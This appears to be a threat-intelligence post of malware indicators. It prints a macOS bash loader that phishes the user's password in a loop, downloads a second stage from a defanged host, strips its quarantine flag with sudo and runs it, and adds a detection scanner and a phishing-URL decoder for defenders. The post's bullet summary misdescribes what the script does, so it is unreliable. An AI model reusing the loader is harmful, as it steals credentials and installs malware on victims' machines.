Clickfix C2 linked to domain merkantalolol[.]asia (188.114.97.3)
Payload is an obfuscated terminal command to open powershell and download "5c1e18e2.exe"
ANY.RUN run : https://app.any.run/tasks/37d87c42-2319-4dcb-8a18-28fc3ac94283
winrar exploit
report :
https://publish.obsidian.md/koffei/%F0%9F%93%A1Koffei/Is+Winrar+or+not+Winrar
Date and time: Dec. 8, 2025
Command (the `/bin/bash -c` payload, re-wrapped one statement per line):
```
#!/bin/bash
username=$(whoami)
# Loop until the typed password validates against the local directory (dscl -authonly)
while true; do
  echo -n "System Password: "
  read password
  echo
  if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then
    echo -n "$password" > /tmp/.pass
    break
  else
    echo "Incorrect password! Try again."
  fi
done
# Fetch the second stage, strip its extended attributes (including the quarantine flag)
# with the harvested password via sudo -S, then execute it
curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1
echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1
chmod +x /tmp/update
/tmp/update
```
Script used to:
- identify actively connected users
- open a loop requesting the user's password
- record attempted passwords in the [/tmp/update] file
- terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update]
This script was launched following the use of [runningboardd], an "RMM" type application used to manage application resources on MacOS.
(links cleaned)
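Detection angle for the entry above, as an added example (not part of the original post): a small scanner that runs over process-execution command lines and flags the combination this loader uses, a `dscl . -authonly` password check inside a `read` prompt loop, a `curl -o` download into /tmp, `sudo -S` fed from stdin, `xattr` stripping the quarantine flag, and `chmod +x` on the dropped file. Indicator names, the event field names and the benign sample events are constructed for this example; the malicious sample is the defanged one-liner from the post.

```python
"""Flag macOS password-prompt loaders like the bash one-liner in the post above.

Added example, not code from the original post. Scans constructed process
events (cmdline strings) for the building blocks of the technique; any single
indicator is common in admin usage, so the verdict needs the combination.
"""
import re

# Indicator labels are chosen for this example, not vendor rule IDs.
INDICATORS = {
    "dscl_authonly": re.compile(r"\bdscl\s+\.\s+-authonly\b"),
    "password_prompt": re.compile(r"\bread\s+(?:-s\s+)?\w*pass\w*", re.I),
    "curl_to_tmp": re.compile(r"\bcurl\b[^;|&]*-o\s+/tmp/\S+"),
    "sudo_stdin_password": re.compile(r"\bsudo\s+-S\b"),
    "quarantine_strip": re.compile(r"\bxattr\s+(?:-c\b|-d\s+com\.apple\.quarantine\b)"),
    "exec_from_tmp": re.compile(r"\bchmod\s+\+x\s+/tmp/\S+"),
}

# Accept live and defanged URLs so the rule works on IOC posts as well as telemetry.
URL_RE = re.compile(r"\bh(?:xx|tt)ps?(?:\[://\]|://)[^\s'\"`]+")


def analyze(cmdline: str) -> dict:
    """Return the indicators hit, any URLs found, and a verdict for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    urls = URL_RE.findall(cmdline)
    if "dscl_authonly" in hits and "password_prompt" in hits:
        verdict = "credential_phish"      # prompt loop that validates the typed password
    elif len(hits) >= 3:
        verdict = "suspicious_loader"     # download + quarantine strip + exec from /tmp
    else:
        verdict = None                    # lone indicators are routine admin activity
    return {"hits": hits, "urls": urls, "verdict": verdict}


def scan(events: list) -> list:
    """Run analyze() over process events; return only the flagged ones."""
    flagged = []
    for ev in events:
        result = analyze(ev["cmdline"])
        if result["verdict"]:
            flagged.append({"pid": ev["pid"], "user": ev["user"], **result})
    return flagged


# Constructed sample events: the first cmdline is the defanged one-liner from the
# post above; the others are benign commands that each share one token with it.
SAMPLE_EVENTS = [
    {"pid": 4101, "user": "alice", "cmdline":
        '/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n '
        '"System Password: " read password echo if dscl . -authonly "$username" '
        '"$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break '
        'else echo "Incorrect password! Try again." fi done curl -o /tmp/update '
        'hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" | '
        'sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update'},
    {"pid": 4102, "user": "alice", "cmdline": "dscl . -read /Users/alice UniqueID"},
    {"pid": 4103, "user": "bob", "cmdline": "curl -o /tmp/status.json https://api.example.com/status"},
    {"pid": 4104, "user": "bob", "cmdline": "xattr -d com.apple.quarantine /Users/bob/Downloads/tool.dmg"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["pid"], hit["user"], hit["verdict"], hit["hits"], hit["urls"])
```

Only the first event is returned; the three benign ones each trip a single indicator and stay below the threshold. In an EDR query the same regexes map onto the process command-line field, and the extracted URL is the download IOC to pivot on.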
Command and control domain for "Uclient.exe" RAT https://app.any.run/tasks/a664d5b7-018b-4e21-9e76-deee05e0407c
Web scam emulating the French fine payment platform:
hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/Documents/embed?url=aHR0cHM6Ly9saGFiYmFidG91cnMuYnQvYW1lbmRlcy1hbnRhaS1nb3V2L0RvY3VtZW50cy8vY2FjaGUvUFZLRUJzdmp2a3piV1JETT8=
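The `embed?url=` parameter in the link above is base64; decoding it gives the page the embed actually loads, which is a second indicator for the report. Added helper (not from the original post) that refangs the link in memory, pulls the parameter without `parse_qs` (which would turn base64's `+` into a space), decodes it, and defangs the result before returning it. Function names and the second, negative sample link are constructed for this example.

```python
"""Recover the target hidden behind embed?url= in the defanged scam link above.

Added example, not code from the original post. Refanging happens only in
memory; the decoded target is defanged again so it can go straight into a report.
"""
import base64
from typing import Optional
from urllib.parse import unquote, urlsplit

# The indicator exactly as posted above (defanged).
SCAM_LINK = ("hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/Documents/embed?url="
             "aHR0cHM6Ly9saGFiYmFidG91cnMuYnQvYW1lbmRlcy1hbnRhaS1nb3V2L0RvY3VtZW50cy8vY2FjaGUvUFZLRUJzdmp2a3piV1JETT8=")


def refang(ioc: str) -> str:
    """Undo the hxxp / [://] / [.] defanging so URL parsing works."""
    return ioc.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")


def defang(url: str) -> str:
    """Defang scheme and host only; path dots are left alone so the IOC stays readable."""
    scheme, rest = url.split("://", 1)
    host, sep, tail = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}[://]{host.replace('.', '[.]')}{sep}{tail}"


def query_param(url: str, name: str) -> Optional[str]:
    """Split the query by hand: parse_qs would decode '+' (a base64 digit) to a space."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None


def decode_embed_target(defanged_link: str) -> Optional[str]:
    """Return the defanged URL carried in the base64 url= parameter, or None if absent/invalid."""
    raw = query_param(refang(defanged_link), "url")
    if raw is None:
        return None
    raw += "=" * (-len(raw) % 4)          # tolerate stripped base64 padding
    try:
        target = base64.b64decode(raw, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if not target.startswith(("http://", "https://")):
        return None                        # parameter was not a URL; nothing to report
    return defang(target)


if __name__ == "__main__":
    print(decode_embed_target(SCAM_LINK))
```

For the posted link the decoded parameter points back at the same host, `hxxps[://]lhabbabtours[.]bt/amendes-antai-gouv/Documents//cache/PVKEBsvjvkzbWRDM?`, i.e. the cached phishing page the embed wrapper loads. Parameters that do not decode to a URL return None rather than a garbage indicator.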